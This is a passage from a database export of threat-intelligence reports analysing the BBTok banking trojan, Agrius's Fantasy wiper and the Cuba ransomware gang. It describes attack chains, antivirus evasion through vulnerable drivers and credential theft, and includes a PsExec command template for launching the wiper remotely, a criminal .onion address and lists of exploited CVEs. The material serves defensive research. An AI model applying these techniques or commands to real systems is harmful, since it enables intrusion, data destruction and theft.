threat\nactors are Brazilians, which is known for its active banking malware eco-system.\n\nConclusion\n\nAlthough BBTok has been able to remain under the radar due to its elusive techniques and targeting\nvictims only in Mexico and Brazil, its evident that it is still actively deployed. Due to its many\n\n\fcapabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it\nstill poses a danger to organizations and individuals in the region.\n\nIt is rare for security researchers to get an up-close look at the attackers workbench, and even rarer\nto get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors,\nincluding financially motivated ones, are constantly evolving and improving their methods, as well as\nfollowing new security trends and trying out fresh ideas and opportunities. To keep up and protect\nagainst future attacks, security researchers must do the same.\n\nCheck Point Protections\n\nCheck Point Threat Emulation:\n\n Banker.Wins.BBTok.A\n Banker.Win.BBTok.B\n Technique.Wins.SuxXll.A\n Trojan.Win.XllAddings.A\n\nHarmony Endpoint:\n\n Trojan.Win.Generic.AQ\n Trojan.Win.Generic.AR\n\nRecently, 360 Security Center has detected that a new banking Trojan BBtok has become\npopular in Mexico through its file-less attack protection function. The Trojan sends a\ncompressed package containing malicious lnk files to users through phishing emails or\nother means. When the user clicks on the malicious lnk, the carried powershell script will be\nactivated to execute subsequent attack payloads.\n\nThe overall virus operation process is as follows:\n\nAfter BBtok is deployed on the victims machine, it will run a backdoor module. The attacker\ncan execute different malicious functions by issuing control commands, including creating a\nfalse bank security detection window to trick the user into entering login credentials, thereby\nstealing the users account password.\n\nFile-less Attack\n\nThe file of Lnk carries malicious powershell commands to trick the user into clicking,\nactivate the malicious code, download and execute the subsequent malicious payload:\n\n\fBase64 encrypted and stored the downloaded shellcode. After decryption, it is a Loader\nwritten by .Net.\n\nPersistence\n\nLoader will replace winmm.dll in the system directory to realize virus residency and\nself-start:\n\nWinmm.dll loads malicious dynamic libraries:\n\nAnti-virus\n\nLoader will then load the anti-virus driver. When the user is a 64-bit system, it uses the open\nsource KDU (Kernel Driver Utility) to load:\n\nKDU (https://github.com/hfiref0x/KDU) uses a vulnerable driver of legitimate software to\naccess arbitrary kernel memory with read/write attributes:\n\nThe loaded confrontation driver will violently enumerate and remove all registry callbacks:\n\nThen delete all the registry entries of mainstream anti-virus software to make the anti-virus\nsoftware invalid:\n\nBypass Antivirus\n\nBBtok extracts the main backdoor control program from the compressed package. Hackers\ncan control the victims machine by issuing the backdoor instructions in the picture,\nincluding window control, process management, key logger, clipboard hijacking and other\nfunctions.\n\nBanker Trojan\n\nHackers can also choose to simulate different bank false security verification interfacs\nthrough backdoor control commands, and steal user login credentials for Santander,\nBanBajio, ScotiaBank, AFIRME, Banregio, Banco Azteca, Multiva, Inbursa, HSBC, Banorte,\nCitiBanamex, BBVA, etc.\n\n\f\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-28T16:02:39.414Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6515a4088749acb9f47faf86"
  },
  "name": "Fantasy",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Fantasy.pdf",
  "file_size": "154 KB",
  "content": "The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in\n\nsupply-chain attacks impacting organizations in Israel, Hong Kong, and South\n\nAfrica.\n\nThe campaign started in February and unfolded at full scale in March 2022,\n\nbreaching an IT support services firm, a diamond wholesaler, a jeweler, and\n\nan HR consulting company.\n\nIn this campaign, Agrius used a new wiper named 'Fantasy' hidden inside a\n\nsoftware suite created by an Israeli vendor. This software is commonly used in\n\nthe diamond industry.\n\nSelect\" feature\n\nAccording to ESET analysts, 'Fantasy' is an evolution of the 'Apostle' wiper,\n\nwhich the threat actor used in previous campaigns.\n\nWipers are a category of malware aiming to delete data on breached\n\ncomputers, causing digital destruction and business interruption.\n\nSimultaneous attacks\n\nThe Agrius APT (Advanced Persistent Threat) breached a South African\n\norganization in the diamond industry on February 20, 2022, dropping\n\ncredential harvesters like MiniDump and SecretsDump on its network to steal\n\naccount credentials.\n\n\fThe hackers leveraged the stolen credentials to spread further throughout the\n\nbreached network, presumably collecting information and gaining access to\n\nother systems.\n\nOn March 12, 2022, Argius deployed Host2IP and a new tool named 'Sandals'\n\nto spread the Fantasy wiper on reachable devices.\n\nSandals is a Windows executable that connects to systems on the same\n\nnetwork via SMB and writes a batch file executed via PsExec to launch the\n\nFantasy wiper.\n\nOn the same day in March, and within a 2.5-hour time frame, the attackers\n\ndeployed all four mentioned tools against Israeli targets and a company in\n\nHong Kong.\n\nAll attacked companies were customers of the affected software developer,\n\nwho, according to ESET, realized the problem immediately and pushed clean\n\nupdates within hours.\n\nAgrius victims map (ESET)\n\nThe 'Fantasy' wiper\n\nThe Fantasy data wiper is a 32-bit Windows executable ('fantasy45.exe' and\n\n'fantasy35.exe'). Upon execution, it gets a list of all drives and their directories\n\nexcept for the Windows folder, which is skipped, and all files in each directory.\n\nFantasy overwrites the content of each file with random data, sets timestamps\n\nto midnight 2037, and deletes it. This process attempts to prevent the files\n\nfrom being recovered with data recovery tools.\n\nNext, Fantasy deletes registry keys in HKCR, clears all WinEventLogs, deletes\n\nthe Windows SystemDrive folder, and then enters a two-minute sleep.\n\n\fFinally, the wiper overwrites the master boot record, deletes itself, and reboots\n\nthe system after another 30-second delay.\n\nHowever, even though these were destructive attacks, ESET says that victims\n\ncould get back up and running in hours.\n\n\"It is likely that %SYSTEMDRIVE% recovery is possible. Victims were\n\nobserved to be back up and running within a matter of hours,\" explains ESET.\n\nESET comments that while there's extensive code overlap between Apostle\n\nand Fantasy, the latter is purely a wiper, not having any data encryption\n\ncapabilities, and does not create ransom notes.\n\nESET researchers analyzed a supply-chain attack abusing an Israeli software\ndeveloper to deploy Fantasy, Agriuss new wiper, with victims including the diamond\nindustry\n\nESET researchers discovered a new wiper and its execution tool, both attributed to the\nAgrius APT group, while analyzing a supply-chain attack abusing an Israeli software\ndeveloper. The group is known for its destructive operations.\nIn February 2022, Agrius began targeting Israeli HR and IT consulting rms, and users of\nan Israeli software suite used in the diamond industry. We believe that Agrius operators\nconducted a supply-chain attack abusing the Israeli software developer to deploy their\nnew wiper, Fantasy, and a new lateral movement and Fantasy execution tool, Sandals.\nThe Fantasy wiper is built on the foundations of the previously reported Apostle wiper but\ndoes not attempt to masquerade as ransomware, as Apostle originally did. Instead, it goes\nright to work wiping data. Victims were observed in South Africa  where reconnaissance\nbegan several weeks before Fantasy was deployed  Israel, and Hong Kong.\nKey points of this blogpost:\n\n Agrius conducted a supply-chain attack abusing an Israeli software suite used in\n\nthe diamond industry.\n\n The group then deployed a new wiper we named Fantasy. Most of its code base\n\ncomes from Apostle, Agriuss previous wiper.\n\n Along with Fantasy, Agrius also deployed a new lateral movement and Fantasy\n\nexecution tool that we have named Sandals.\n\n\f Victims include Israeli HR rms, IT consulting companies, and a diamond\n\nwholesaler; a South African organization working in the diamond industry; and a\njeweler in Hong Kong.\n\nGroup overview\nAgrius is a newer Iran-aligned group targeting victims in Israel and the United Arab\nEmirates since 2020. The group initially deployed a wiper, Apostle, disguised as\nransomware, but later modied Apostle into fully edged ransomware. Agrius exploits\nknown vulnerabilities in internet-facing applications to install webshells, then conducts\ninternal reconnaissance before moving laterally and then deploying its malicious payloads.\nCampaign overview\nOn February 20th, 2022 at an organization in the diamond industry in South Africa, Agrius\ndeployed credential harvesting tools, probably in preparation for this campaign. Then, on\nMarch 12th, 2022, Agrius launched the wiping attack by deploying Fantasy and Sandals,\nrst to the victim in South Africa and then to victims in Israel and lastly to a victim in Hong\nKong.\nVictims in Israel include an IT support services company, a diamond wholesaler, and an HR\nconsulting rm. South African victims are from a single organization in the diamond\nindustry, with the Hong Kong victim being a jeweler.\n\nThe campaign lasted less than three hours and within that timeframe ESET customers\nwere already protected with detections identifying Fantasy as a wiper, and blocking its\nexecution. We observed the software developer pushing out clean updates within a matter\nof hours of the attack. We reached out to the software developer to notify them about a\npotential compromise, but our enquiries went unanswered.\n\nPreparing for departure\nThe rst tools deployed by Agrius operators to victim systems, through means unknown,\nwere:\n\n MiniDump, a C# implementation of mimikatz/pypykatz minidump functionality to\n\nget credentials from LSASS dumps\n\n\f SecretsDump, a Python script that performs various techniques to dump hashes\n\nfrom [a] remote machine without executing any agent there\n\n Host2IP, a custom C#/.NET tool that resolves a hostname to an IP address.\n\nUsernames, passwords, and hostnames collected by these tools are required for Sandals\nto successfully spread and execute the Fantasy wiper. Agrius operators deployed\nMiniDump and SecretsDump to this campaigns rst victim on February 20th, 2022, but\nwaited until March 12th, 2022 to deploy Host2IP, Fantasy, and Sandals (consecutively).\nSandals: Igniting the Fantasy (wiper)\nSandals is a 32-bit Windows executable written in C#/.NET. We chose the name because\nSandals is an anagram of some of the command line arguments it accepts. It is used to\nconnect to systems in the same network via SMB, to write a batch le to disk that\nexecutes the Fantasy wiper, and then run that batch le via PsExec with this command line\nstring:\n\n PsExec.exe /accepteula -d -u \"<username>\" -p \"<password>\" -s\n\n\"C:\\<path>\\<GUID>.bat\"\n\nThe PsExec options have the following meanings:\n\n -d  Don't wait for process to terminate (non-interactive).\n /accepteula  Suppress display of the license dialog.\n -s  Run the remote process in the SYSTEM account.\n\nSandals does not write the Fantasy wiper to remote systems. We believe that the Fantasy\nwiper is deployed via a supply-chain attack using the software developers software\nupdate mechanism. This assessment is based on several factors:\n\n all victims were customers of the affected software developer;\n the Fantasy wiper was named in a similar fashion to legitimate versions of the\n\nsoftware;\n\n all victims executed the Fantasy wiper within a 2.5 hour timeframe, where victims\n\nin South Africa were targeted rst, then victims in Israel, and nally victims in Hong\nKong (we attribute the delay in targeting to time zone differences and a hardcoded\ncheck-in time within the legitimate software); and,\n\n lastly, the Fantasy wiper was written to, and executed from,\n\n%SYSTEM%\\Windows\\Temp, the default temp directory for Windows systems.\n\nAdditionally, we believe the victims were already using PsExec, and Agrius operators\nchose to use PsExec to blend into typical administrative activity on the victims machines,\n\n\fand for ease of batch le execution. Table 1 lists the command line arguments accepted\nby Sandals.\nTable 1. Sandals arguments and their descriptionsThe batch le written to disk by Sandals\nis named <GUID>.bat, where the lename is the output of the Guid.NewGuid() method.\nAn example of a Sandals batch le is shown in Figure 2.\n\nThe base64 string that follows fantasy35.exe is likely a relic of the execution\nrequirements of Apostle (more details in the Attribution to Agrius section). However, the\nFantasy wiper only looks for an argument of 411 and ignores all other runtime input (see\nthe next section for more information).\nFantasy wiper\nThe Fantasy wiper is also a 32-bit Windows executable written in C#/.NET, so named for\nits lenames: fantasy45.exe and fantasy35.exe, respectively. Figure 3 depicts the\nexecution ow of the Fantasy wiper.\n\nInitially, Fantasy creates a mutex to ensure that only one instance is running. It collects a\nlist of xed drives but excludes the drive where the %WINDOWS% directory exists. Then it\nenters a for loop iterating over the drive list to build a recursive directory listing, and uses\nthe RNGCryptoServiceProvider.GetBytes method to create a cryptographically\nstrong sequence of random values in a 4096-byte array. If a runtime argument of 411 is\nsupplied to the wiper, the for loop overwrites the contents of every le with the\naforementioned byte array using a nested while loop. Otherwise, the for loop only\noverwrites les with a le extension listed in the Appendix.\nFantasy then assigns a specic timestamp (2037-01-01 00:00:00) to these le\ntimestamp properties:\n\nand then deletes the le. This is presumably done to make recovery and forensic analysis\nmore dicult.\nDuring the for loop, the Fantasy wiper counts errors within the current directory when\nattempting to overwrite les. If the number of errors exceeds 50, it writes a batch le,\n%WINDOWS%\\Temp\\<GUID>.bat, that deletes the directory with the les causing the\nerrors, and then self-deletes. File wiping then resumes in the next directory in the target\nlist.\n\n\fOnce the for loop completes, the Fantasy wiper creates a batch le in %WINDOWS%\\Temp\ncalled registry.bat. The batch le deletes the following registry keys:\n\nThen it runs the following to attempt to clear le system cache memory:\n\nLastly, registry.bat deletes itself (del %0).\nNext, the Fantasy wiper clears all Windows event logs and creates another batch le,\nsystem.bat, in %WINDOWS%\\Temp, that recursively deletes all les on %SYSTEMDRIVE%,\nattempts to clear le system cache memory, and self-deletes. Then Fantasy sleeps for two\nminutes before overwriting the systems Master Boot Record.\nFantasy then writes another batch le, %WINDOWS%\\Temp\\remover.bat, that deletes the\nFantasy wiper from disk and then deletes itself. Then Fantasy wiper sleeps for 30 seconds\nbefore rebooting the system with reason code SHTDN_REASON_MAJOR_OTHER\n(0x00000000) -- Other issue.\nIt is likely that %SYSTEMDRIVE% recovery is possible. Victims were observed to be back up\nand running within a matter of hours.\nAttribution to Agrius\nMuch of the code base from Apostle, initially a wiper masquerading as ransomware then\nupdated to actual ransomware, was directly copied to Fantasy and many other functions in\nFantasy were only slightly modied from Apostle, a known Agrius tool. However, the\noverall functionality of Fantasy is that of a wiper without any attempt to masquerade as\nransomware. Figure 4 shows the le deletion functions in Fantasy and Apostle,\nrespectively. There are only a few small tweaks between the original function in Apostle\nand the Fantasy implementation.\n\nFigure 4. File deletion functions from the Fantasy wiper (top, in red) and Apostle\nransomware (bottom, in green)\nFigure 5 shows that the directory listing function is almost a direct copy, with only the\nfunction variables getting a slight tweak between Apostle and Fantasy.\n\n\fFinally, the GetSubDirectoryFileListRecursive function in Figure 6 is also almost\nan exact copy.\n\nIn addition to the code reuse, we can see remnants of the Apostle execution ow in\nFantasy. In the original analysis of Apostle, SentinelOne notes that Proper execution of the\nransomware version requires supplying it with a base64 encoded argument containing an\nXML of an RSAParameters object. This argument is passed on and saved as the Public Key\nused for the encryption process and is most likely generated on a machine owned by the\nthreat actor. We can see in the batch le in Figure 7, which Sandals creates on remote\nsystems to launch Fantasy, that the same base64-encoded argument containing an XML of\nan RSAParameters object is passed to Fantasy at runtime. Fantasy, however, does not\nuse this runtime argument.\n\nConclusion\nSince its discovery in 2021, Agrius has been solely focused on destructive operations. To\nthat end, Agrius operators probably executed a supply-chain attack by targeting an Israeli\nsoftware companys software updating mechanisms to deploy Fantasy, its newest wiper, to\nvictims in Israel, Hong Kong, and South Africa. Fantasy is similar in many respects to the\nprevious Agrius wiper, Apostle, that initially masqueraded as ransomware before being\nrewritten to be actual ransomware. Fantasy makes no effort to disguise itself as\nransomware. Agrius operators used a new tool, Sandals, to connect remotely to systems\nand execute Fantasy.\n\n\f\f\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-28T16:04:24.986Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651afab9c52236be04cc9ea0"
  },
  "name": "Cuba Ransomware",
  "file_type": null,
  "website_url": "https://securelist.com/cuba-ransomware/110533/",
  "website_title": "Analysis of Cuba ransomware gang activity and tooling | Securelist",
  "file_name": null,
  "file_size": null,
  "content": "This website uses cookies\nWe use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services.\nConsent Selection\nNecessary\nPreferences\nStatistics\nMarketing\nShow details\n\n\n\n\n\n\n\n\n\n\n\n\nUse necessary cookies only\nAllow all cookies\nPowered by Cookiebot by Usercentrics\nHome Products\nSmall Business 1-50 employees\nMedium Business 51-999 employees\nEnterprise 1000+ employees\nby Kaspersky\nCompanyAccount\nGet In Touch\nDark mode\nEnglish\nSolutions\nIndustries\nProducts\nServices\nResource Center\nAbout Us\nGDPR\nContent menu\nSubscribe\nFrom Caribbean shores to your devices: analyzing Cuba ransomware\nSOC, TI AND IR POSTS\n11 SEP 2023\n14 minute read\nAUTHORS\nALEXANDER KIRICHENKO\nGLEB IVANOV\nIntroduction\nKnowledge is our best weapon in the fight against cybercrime. An understanding of how various gangs operate and what tools they use helps build competent defenses and investigate incidents. This report takes a close look at the history of the Cuba group, and their attack tactics, techniques and procedures. We hope this article will help you to stay one step ahead of threats like this one.\nCuba ransomware gang\nCuba data leak site\nThe group’s offensives first got on our radar in late 2020. Back then, the cybercriminals had not yet adopted the moniker “Cuba”; they were known as “Tropical Scorpius”.\nCuba mostly targets organizations in the United States, Canada and Europe. The gang has scored a series of resonant attacks on oil companies, financial services, government agencies and healthcare providers.\nAs with most cyberextortionists lately, the Cuba gang encrypts victims’ files and demands a ransom in exchange for a decryption key. The gang infamously uses complex tactics and techniques to penetrate victim networks, such as exploitation of software vulnerabilities and social engineering. They have been known to use compromised remote desktop (RDP) connections for initial access.\nThe Cuba gang’s exact origins and the identities of its members are unknown, although some researchers believe it might be a successor to another ill-famed extortion gang, Babuk. The Cuba group, like many others of its kind, is a ransomware-as-a-service (RaaS) outfit, letting its partners use the ransomware and associated infrastructure in exchange for a share of any ransom they collect.\nThe group has changed names several times since its inception. We are currently aware of the following aliases it has used:\nColdDraw\nTropical Scorpius\nFidel\nCuba\nThis past February, we came across another name for the gang — “V Is Vendetta”, which deviated from the hackers’ favorite Cuban theme. This might have been a moniker used by a sub-group or affiliate.\nThere is an obvious connection with the Cuba gang: the newly discovered group’s website is hosted in the Cuba domain:\nhttp[:]//test[.]cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd[.]onion/\nWebsite of V IS VENDETTA\nCuba remains active as at the time of writing this, and we keep hearing about new extortion victims.\nVictimology\nIn this section, we used data consensually provided by our users and information about victims from open sources, such as other security vendors’ reports and the data leak site of the ransomware gang itself.\nThe group has attacked numerous companies around the world. Industry affiliation does not seem to be a factor: victims have included retailers, financial and logistical services, government agencies, manufacturers, and others. In terms of geography, most of the attacked companies have been located in the United States, but there have been victims in Canada, Europe, Asia and Australia.\nGeographic distribution of Cuba victims\nRansomware\nThe Cuba ransomware is a single file without additional libraries. Samples often have a forged compilation timestamp: those found in 2020 were stamped with June 4, 2020, and more recent ones, June 19th, 1992.\nCuba extortion model\nExtortion models\nFour extortion models exist today in terms of tools used for pressuring the victim.\nSingle extortion: encrypting data and demanding a ransom just for decryption.\nDouble extortion: besides encrypting, attackers steal sensitive information. They threaten to both withhold the encryption key and publish the stolen information online unless the victim pays up. This is the most popular model among ransomware gangs today.\nTriple extortion: adding a threat to expose the victim’s internal infrastructure to DDoS attacks. The model became widespread after the LockBit gang got DDoS’ed, possibly by a victim. After getting targeted, the hackers realized that DDoS was an effective pressure tool, something they stated openly, setting an example for others. To be fair, isolated cases of triple extortion predate the LockBit case.\nThe fourth model is the least common one, as it implies maximum pressure and is thus more costly. It adds spreading news of the breach among the victim’s investors, shareholders and customers. DDoS attacks in that case are not necessary. This model is exemplified by the recent hack of Bluefield University in Virginia, where the AvosLocker ransomware gang hijacked the school’s emergency broadcast system to send students and staff SMS texts and email alerts that their personal data had been stolen. The hackers urged not to trust the school’s management, who they said were concealing the true scale of the breach, and to make the situation public knowledge as soon as possible.\nThe Cuba group is using the classic double extortion model, encrypting data with the Xsalsa20 symmetric algorithm, and the encryption key, with the RSA-2048 asymmetric algorithm. This is known as hybrid encryption, a cryptographically secure method that prevents decryption without the key.\nCuba ransomware samples avoid encrypting files with the following name extensions: .exe, .dll, .sys, .ini, .lnk, .vbm and .cuba, and the following folders:\n\\windows\\\n\\program files\\microsoft office\\\n\\program files (x86)\\microsoft office\\\n\\program files\\avs\\\n\\program files (x86)\\avs\\\n\\$recycle.bin\\\n\\boot\\\n\\recovery\\\n\\system volume information\\\n\\msocache\\\n\\users\\all users\\\n\\users\\default user\\\n\\users\\default\\\n\\temp\\\n\\inetcache\\\n\\google\\\nThe ransomware saves time by searching for, and encrypting, Microsoft Office documents, images, archives and others in the %AppData%\\Microsoft\\Windows\\Recent\\ directory, rather than all files on the device. It also terminates all SQL services to encrypt any available databases. It looks for data both locally and inside network shares.\nList of services that the Cuba ransomware terminates\nBesides encrypting, the group steals sensitive data that it discovers inside the victim’s organization. The type of data that the hackers are after depends on the industry that the target company is active in, but in most cases, they exfiltrate the following:\nFinancial documents\nBank statements\nCompany accounts details\nSource code, if the company is a software developer\nArsenal\nThe group employs both well-known, “classic” credential access tools, such as mimikatz, and self-written applications. It exploits vulnerabilities in software used by the victim companies: mostly known issues, such as the combination of ProxyShell and ProxyLogon for attacking Exchange servers, and security holes in the Veeam data backup and recovery service.\nMalware\nBughatch\nBurntcigar\nCobeacon\nHancitor (Chanitor)\nTermite\nSystemBC\nVeeamp\nWedgecut\nRomCOM RAT\nTools\nMimikatz\nPowerShell\nPsExec\nRemote Desktop Protocol\nVulnerabilities\nProxyShell:\nCVE-2021-31207\nCVE-2021-34473\nCVE-2021-34523\nProxyLogon:\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nVeeam vulnerabilities:\nCVE-2022-26501\nCVE-2022-26504\nCVE-2022-26500\nZeroLogon:\nCVE-2020-1472\nMapping of the attack arsenal to MITRE ATT&CK® tactics\nProfits\nThe incoming and outgoing payments in the bitcoin wallets whose identifiers the hackers provide in their ransom notes exceed a total of 3,600 BTC, or more than $103,000,000 converted at the rate of $28,624 for 1 BTC. The gang owns numerous wallets, constantly transferring funds between these, and uses bitcoin mixers: services that send bitcoins through a series of anonymous transactions to make the origin of the funds harder to trace.\nPart of the transaction tree in the BTC network\nInvestigation of a Cuba-related incident and analysis of the malware\nHost: SRV_STORAGE\nOn December 19, we spotted suspicious activity on a customer host, which we will refer to as “SRV_STORAGE” in this report. Telemetry data showed three suspicious new files:\nSuspicious events in the telemetry data as discovered by the Kaspersky SOC\nAn analysis of kk65.bat suggested that it served as a stager that initiated all further activity by starting rundll32 and loading the komar65 library into it, which runs the callback function DLLGetClassObjectGuid.\nContents of the .bat file that we found\nLet us take a look inside the suspicious DLL.\nBughatch\nThe komar65.dll library is also known as “Bughatch”, a name it was given in a report by Mandiant.\nThe first thing that caught our attention was the path to the PDB file. There’s a folder named “mosquito” in it, which translates into Russian as “komar”. The latter is a part of the DDL name suggesting the gang may include Russian speakers.\nPath to the komar65.dll PDB file\nThe DLL code presents Mozilla/4.0 as the user agent when connecting to the following two addresses:\ncom, apparently used for checking external connectivity\nThe gang’s command-and-control center. The malware will try calling home if the initial ping goes through.\nAnalysis of komar65.dll\nThis is the kind of activity we observed on the infected host. After Bughatch successfully established a connection with the C2 server, it began collecting data on network resources.\nBughatch activity\nLooking into the C2 servers, we found that in addition to Bughatch, these spread modules that extend the malware’s functionality. One of those collects information from the infected system and sends it back to the server in the form of an HTTP POST request.\nFiles we found on the Cuba C2 servers\nOne could think of Bughatch as a backdoor of sorts, deployed inside the process memory and executing a shellcode block within the space it was allocated with the help of Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject), to then connect to the C2 and await further instructions. In particular, the C2 may send a command to download further malware, such as Cobalt Strike Beacon, Metasploit, or further Bughatch modules.\nBughatch operating diagram\nSRV_Service host\nVeeamp\nAfter some time, we found a malicious process started on a neighboring host; we dubbed this “SRV_Service”:\nMalicious process starting\nVeeamp.exe is a custom-built data dumper written in C#, which leverages security flaws in the Veeam backup and recovery service to connect to the VeeamBackup SQL database and grab account credentials.\nAnalysis of Veeamp\nVeeamp exploits the following Veeam vulnerabilities: CVE-2022-26500, CVE-2022-26501, CVE-2022-26504. The first two allow an unauthenticated user to remotely execute arbitrary code, and the third one, lets domain users do the same. After any of the three are exploited, the malware outputs the following in the control panel:\nUser name\nEncrypted password\nDecrypted password\nUser description in the Credentials table of Veeam: group membership, permissions and so on\nThe malware is not exclusive to the Cuba gang. We spotted it also in attacks by other groups, such as Conti and Yanluowang.\nActivity we saw on SRV_Service after Veeamp finished its job was similar to what we had observed on SRV_STORAGE with Bughatch:\nBughatch activity on SRV_Service\nAs was the case with SRV_STORAGE, the malware dropped three files into the temp folder, and then executed these in the same order, connecting to the same addresses.\nAvast Anti-Rootkit driver\nAfter Bughatch successfully established a connection to its C2, we watched as the group used an increasingly popular technique: Bring Your Own Vulnerable Driver (BYOVD).\nExploiting a vulnerable driver\nThe malicious actors install the vulnerable driver in the system and subsequently use it to various ends, such as terminating processes or evading defenses through privilege escalation to kernel level.\nHackers are drawn to vulnerable drivers because they all run in kernel mode, with a high level of system access. Besides, a legitimate driver with a digital signature will not raise any red flags with security systems, helping the attackers to stay undetected for longer.\nDuring the attack, the malware created three files in the temp folder:\naswarpot.sys: a legitimate anti-rootkit driver by Avast that has two vulnerabilities: CVE-2022-26522 and CVE-2022-26523, which allow a user with limited permissions to run code at kernel level.\nKK.exe: malware known as Burntcigar. The file we found was a new variety that used the flawed driver to terminate processes.\nav.bat batch script: a stager that helps the kernel service to run the Avast driver and executes Burntcigar.\nAnalysis of the BAT file and telemetry data suggests that av.bat uses the sc.exe utility to create a service named “aswSP_ArPot2”, specifying the path to the driver in the С\\windows\\temp\\ directory and the service type as kernel service. The BAT file then starts the service with the help of the same sc.exe utility and runs KK.exe, which connects to the vulnerable driver.\nContents of the .bat file that we found\nBurntcigar\nThe first thing we noticed while looking into Burntcigar was the path to the PDB file, which contained a folder curiously named “Musor” (the Russian for “trash”), more indication that the members of the Cuba gang may speak Russian.\nPath to the KK.exe PDB file\nWe further discovered that the sample at hand was a new version of Burntcigar, undetectable by security systems at the time of the incident. The hackers had apparently updated the malware, as in the wake of previous attacks, many vendors were able to easily detect the logic run by older versions.\nYou may have noticed that in the screenshot of our sample below, all data about processes to be terminated is encrypted, whereas older versions openly displayed the names of all processes that the attackers wanted stopped.\nComparison between the old and new version of Burntcigar\nThe malware searches for process names that suggest a relation to popular AV or EDR products and adds their process IDs to the stack to terminate later.\nBurntcigar uses the DeviceIoContol function to access the vulnerable Avast driver, specifying the location of the code that contains the security issue as an execution option. The piece of code contains the ZwTerminateProcess function, which the attackers use for terminating processes.\nAnalysis of Burntcigar\nFortunately, our product’s self-defense was able to cope with the malware by blocking all hooks to the driver.\nLater, we discovered similar activity exploiting the Avast anti-rootkit driver on the Exchange server and the SRV_STORAGE host. In both cases, the attackers used a BAT file to install the insecure driver and then start Burntcigar.\nBurntcigar activity on the neighboring hosts\nSRV_MAIL host (Exchange server)\nOn December 20, the customer granted our request to add the Exchange server to the scope of monitoring. The host must have been used as an entry point to the customer network, as the server was missing critical updates, and it was susceptible to most of the group’s initial access vectors. In particular, SRV_MAIL had the ProxyLogon, ProxyShell and Zerologon vulnerabilities still unremediated. This is why we believe that the attackers penetrated the customer network through the Exchange server.\nTelemetry data starts coming in\nOn SRV_MAIL, the SqlDbAdmin user showed the same kind of activity as that which we had observed on the previous hosts.\nMalicious activity by SqlDbAdmin\nWe found that the attackers were using the legitimate gotoassistui.exe tool for transferring malicious files between the infected hosts.\nGoToAssist is an RDP support utility often used by technical support teams, but the application is often abused to bypass any security defenses or response teams when moving files between systems.\nSending malicious files via gotoassistui.exe\nWe also found that new Bughatch samples were being executed. These used slightly different file names, callback functions and C2 servers, as our systems were successfully blocking older versions of the malware at that time.\nBughatch activity\nSqlDbAdmin\nWe wondered who that SqlDbAdmin was. The answer came through a suspicious DLL, addp.dll, which we found manually on a compromised host.\nSuspicious dynamic library\nWe found that it used the WIN API function NetUserAdd to create the user. The name and password were hard-coded inside the DLL.\nAnalysis of addp.dll\nAs we looked further into the library, we found that it used the RegCreateKey function to enable RDP sessions for the newly created user by modifying a registry setting. The library then added the user to the Special Account registry tree to hide it from the system login screen, an interesting and fairly unconventional persistence technique. In most cases, bad actors add new users with the help of scripts thatsecurity products rarely miss.\nAnalysis of addp.dll\nCobalt Strike\nWe found a suspicious DLL, ion.dll, running on the Exchange server as part of the rundll32 process with unusual execution options. At first, we figured that the activity was similar to what we had earlier seen with Bughatch. However, further analysis showed that the library was, in fact, a Cobalt Strike Beacon.\nExecution of the suspicious ion.dll file\nWhen we were looking at the ion.dll code, what caught our attention was execution settings and a function that uses the Cobalt Strike configuration. The library used the VirtualAlloc function for allocating process memory to execute the Cobalt Strike Beacon payload in, later.\nAnalysis of ion.dll\nAll configuration data was encrypted, but we did find the function used for decrypting that. To find the Cobalt Strike C2 server, we inspected a rundll32 memory dump with ion.dll loaded into it, running with the same settings it did on the victim host.\nMemory dump of rundll32\nFinding out the name of the C2 helped us to locate the history of communications with that server within the telemetry data. After the malware connected to the C2, it downloaded two suspicious files into the Windows folder on the infected server and then executed these. Unfortunately, we were not able to obtain the two files for analysis, as the hackers had failed to disable security at the previous step, and the files were wiped off the infected host. We do believe, though, that what we were dealing with was the ransomware itself.\nCommunications with the attackers’ C2 server\nThe customer promptly isolated the affected hosts and forwarded the incident to the Kaspersky Incident Response team for further investigation and search for possible artifacts. This was the last we saw of the malicious actor’s activity in the customer system. The hosts avoided encryption thanks to the customer following our recommendations and directions, and responding to the incident in time.\nNew malware\nWe found that VirusTotal contained new samples of the Cuba malware with the same file metadata as the ones in the incident described above. Some of those samples had successfully evaded detection by all cybersecurity vendors. We ran our analysis on each of the samples. As you can see from the screenshot below, these are new versions of Burntcigar using encrypted data for anti-malware evasion. We have made Yara rules that detect these new samples, and we are providing these in the attachment to this article.\nNew malware samples\nBYOVD (Bring Your Own Vulnerable Driver)\nWe will now take a closer look at an attack that uses insecure drivers, which we observed as we investigated the incident and which is currently growing in popularity as various APT and ransomware gangs add it to their arsenals.\nBring Your Own Vulnerable Driver (BYOVD) is a type of attack where the bad actor uses legitimate signed drivers that are known to contain a security hole to execute malicious actions inside the system. If successful, the attacker will be able to exploit the vulnerabilities in the driver code to run any malicious actions at kernel level!\nUnderstanding why this is one of the most dangerous kinds of attacks takes a quick refresher on what drivers are. A driver is a type of software that acts as an intermediary between the operating system and the device. The driver converts OS instructions into commands that the device can interpret and execute. A further use of drivers is supporting applications or features that the operating system originally lacks. As you can see from the image below, the driver is a layer of sorts between user mode and kernel mode.\nUser mode and kernel mode interaction diagram. Source:\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode\nApplications running in user mode have fewer privileges to control the system. All they can get access to is a virtualized memory area that is isolated and protected from the rest 